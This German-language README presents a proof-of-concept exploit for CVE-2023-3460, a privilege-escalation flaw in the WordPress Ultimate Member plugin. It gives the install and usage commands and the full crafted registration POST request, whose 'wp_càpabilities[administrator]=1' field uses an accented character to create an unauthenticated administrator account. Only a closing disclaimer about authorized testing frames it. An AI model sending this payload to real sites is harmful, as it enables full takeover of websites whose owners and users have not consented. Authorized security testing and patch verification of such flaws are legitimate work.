
Proof-of-Concept-Exploit für CVE-2023-3460, eine Privilegieneskalations-Schwachstelle im WordPress Ultimate Member Plugin. Erstellt ein Admin-Konto über eine manipulierte Registrierungsanfrage. Nur für autorisierte Tests.
Dies ist ein Proof-of-Concept-Exploit (PoC) für CVE-2023-3460, eine kritische Schwachstelle im WordPress-Plugin Ultimate Member. Er ermöglicht nicht authentifizierten Benutzern, ihre Privilegien durch das Erstellen einer bösartigen Registrierungsanfrage auf Administrator zu erweitern.
🔥 Auswirkungen: Vollständige Kompromittierung der Website durch die Erstellung nicht autorisierter Administratorkonten.
requests-Bibliothekurllib3-Bibliothekbeautifulsoup4-BibliothekAbhängigkeiten installieren:
pip3 install requests urllib3 beautifulsoup4
python3 CVE-2023-3460.py -t <TARGET_URL> -u <NEW_USERNAME> -p <NEW_PASSWORD>
python3 CVE-2023-3460.py -t http://localhost/register/ -u pwnadmin -p Pass@123
_wpnonce) von der Registrierungsseite abwp_capabilities mit der Rolle administratorPOST /register/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
user_login=pwnadmin&
[email protected]&
user_password=Pass@123&
wp_càpabilities[administrator]=1&
_um_nonce=<nonce_value>
Dieses Skript wird ausschließlich für Bildungs- und autorisierte Testzwecke bereitgestellt. Die unbefugte Ausnutzung von Systemen ist illegal und unethisch. Verwenden Sie es nur auf Systemen, die Ihnen gehören oder für deren Tests Sie eine Genehmigung haben.